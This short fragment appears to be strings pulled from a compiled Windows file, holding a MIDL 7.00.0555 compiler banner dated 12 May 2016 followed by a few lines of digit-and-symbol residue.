Created by MIDL version 7.00.0555 at Thu May 12 17:02:02 2016
7%8x8
8%8S8r8x8
1 2$2(2,2
3$3(3,3034383
4(4/44484
4&5,5054585
0